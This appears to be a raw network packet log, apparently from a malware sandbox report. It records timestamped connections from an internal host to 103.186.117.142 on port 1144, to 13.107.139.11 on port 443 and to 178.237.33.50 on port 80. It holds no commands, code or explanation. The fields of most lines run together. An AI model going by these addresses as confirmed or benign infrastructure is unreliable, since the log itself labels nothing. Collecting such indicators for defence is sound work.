                                                                                                                                                  Apr 24, 2024 07:20:44.900557995 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.900588989 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.900713921 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.900732994 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.900764942 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.900777102 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.900849104 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.900883913 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.900968075 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.900985956 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.901022911 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.901081085 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.901098967 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.901128054 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.901134968 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.901251078 CEST114449712103.186.117.142192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 24, 2024 07:20:44.901271105 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.901288033 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.901288986 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.901331902 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.901387930 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.901407957 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.901487112 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.901542902 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.901593924 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.901624918 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.901704073 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.901848078 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.901882887 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.901890993 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.901910067 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.901942015 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.901949883 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.902071953 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.902089119 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.902107954 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.902205944 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.902224064 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.902240992 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.902327061 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.902345896 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.902362108 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.902363062 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.902396917 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.902503014 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.902520895 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.902546883 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.902556896 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.902645111 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.902662039 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.902677059 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.902681112 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.902714014 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.902812958 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.902831078 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.902848959 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.902867079 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.903068066 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.903085947 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.903096914 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.903157949 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.903270006 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.903289080 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.903306961 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.903327942 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.903506994 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.903526068 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.903542995 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.903543949 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.903574944 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.903654099 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.903671026 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.903688908 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.903704882 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.903841019 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.903857946 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.903876066 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.903875113 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.903907061 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.903987885 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.904006004 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.904022932 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.904042959 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.904145002 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.904162884 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.904180050 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.904181004 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.904213905 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.904318094 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.904337883 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.904356003 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.904371977 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.904524088 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.904541016 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.904558897 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.904558897 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.904592991 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.904715061 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.904732943 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.904751062 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.904767036 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.904818058 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.904851913 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.904916048 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.904933929 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.904952049 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.904963970 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.905095100 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.905112982 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.905129910 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.905133009 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.905160904 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.905235052 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.905253887 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.905270100 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.905294895 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.905374050 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.905394077 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.905406952 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.905412912 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.905455112 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.905725956 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.905752897 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.905765057 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.905806065 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.905967951 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.905985117 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.906002998 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.906003952 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.906035900 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.906203032 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.906229019 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.906248093 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.906265020 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.906373978 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.906399012 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.906407118 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.906416893 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.906459093 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.906524897 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.906543016 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.906560898 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.906577110 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.906707048 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.906725883 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.906749010 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.906749964 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.906780005 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.906847000 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.906864882 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.906882048 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.906897068 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.906976938 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.906995058 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.907011032 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.907011986 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.907040119 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.907247066 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.907263994 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.907280922 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.907296896 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.907299995 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.907332897 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.907376051 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.907393932 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.907409906 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.907424927 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.907557964 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.907576084 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.907594919 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.907596111 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.907625914 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.907676935 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.907695055 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.907712936 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:44.907727003 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:44.962526083 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:55.074127913 CEST | 49718 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:55.074167967 CEST | 443 | 49718 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:55.074238062 CEST | 49718 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:55.074964046 CEST | 49718 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:55.075007915 CEST | 443 | 49718 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:55.076828003 CEST | 49718 | 443 | 192.168.2.8 | 13.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:55.109797001 CEST49719443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:55.109872103 CEST4434971913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:55.109957933 CEST49719443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:55.111924887 CEST49719443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:55.111953020 CEST4434971913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:55.641155005 CEST4434971913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:55.641239882 CEST49719443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:55.643771887 CEST49719443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:55.643779039 CEST4434971913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:55.644007921 CEST4434971913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:55.694489002 CEST49719443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:55.699321032 CEST49719443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:55.744123936 CEST4434971913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:56.212752104 CEST4434971913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:56.212837934 CEST4434971913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:56.212894917 CEST49719443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:56.213146925 CEST49719443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:56.213160038 CEST4434971913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:56.213182926 CEST49719443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:56.213187933 CEST4434971913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:56.369117975 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:56.764638901 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:56.764703989 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:56.764736891 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:56.764751911 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:56.764791965 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:56.764940023 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:56.765062094 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:57.167428017 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:57.167540073 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:57.167654991 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:57.175451994 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:57.175518036 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:57.759736061 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:57.759819031 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:21:03.715651035 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:03.717187881 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:21:03.947242022 CEST49721443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:03.947302103 CEST4434972113.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:03.947371960 CEST49721443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:03.947514057 CEST49721443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:03.947559118 CEST4434972113.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:03.947606087 CEST49721443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:03.965270042 CEST49722443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:03.965312004 CEST4434972213.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:03.965378046 CEST49722443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:03.966506004 CEST49722443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:03.966516972 CEST4434972213.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:04.195489883 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:04.486274004 CEST4434972213.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:04.486355066 CEST49722443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:04.488336086 CEST49722443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:04.488353014 CEST4434972213.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:04.488665104 CEST4434972213.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:04.538815975 CEST49722443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:04.584110975 CEST4434972213.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:05.416019917 CEST4434972213.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:05.416132927 CEST4434972213.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:05.416220903 CEST49722443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:05.416547060 CEST49722443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:05.416564941 CEST4434972213.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:05.416584969 CEST49722443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:05.416590929 CEST4434972213.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:21.131962061 CEST49724443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:21.132005930 CEST4434972413.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:21.132076025 CEST49724443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:21.132999897 CEST49724443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:21.133088112 CEST4434972413.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:21.133177042 CEST49724443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:21.153031111 CEST49725443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:21.153090000 CEST4434972513.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:21.153168917 CEST49725443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:21.154360056 CEST49725443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:21.154375076 CEST4434972513.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:21.682632923 CEST4434972513.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:21.682759047 CEST49725443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:21.684365988 CEST49725443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:21.684386015 CEST4434972513.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:21.684720993 CEST4434972513.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:21.728533983 CEST49725443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:21.730921984 CEST49725443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:21.776125908 CEST4434972513.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:22.622329950 CEST4434972513.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:22.622422934 CEST4434972513.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:22.622561932 CEST49725443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:22.622770071 CEST49725443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:22.622798920 CEST4434972513.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:22.622814894 CEST49725443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:21:22.622823000 CEST4434972513.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:33.745455980 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:33.746967077 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:21:34.164139986 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:21:52.335706949 CEST4971480192.168.2.8178.237.33.50
                                                                                                                                                  Apr 24, 2024 07:21:53.165518045 CEST4971480192.168.2.8178.237.33.50
                                                                                                                                                  Apr 24, 2024 07:21:54.873601913 CEST4971480192.168.2.8178.237.33.50
                                                                                                                                                  Apr 24, 2024 07:21:57.968511105 CEST4971480192.168.2.8178.237.33.50
                                                                                                                                                  Apr 24, 2024 07:22:03.774641991 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:22:03.776406050 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:22:04.164585114 CEST4971480192.168.2.8178.237.33.50
                                                                                                                                                  Apr 24, 2024 07:22:04.211218119 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:22:16.368603945 CEST4971480192.168.2.8178.237.33.50
                                                                                                                                                  Apr 24, 2024 07:22:33.806273937 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:22:33.809978008 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:22:34.273492098 CEST114449711103.186.117.142192.168.2.8
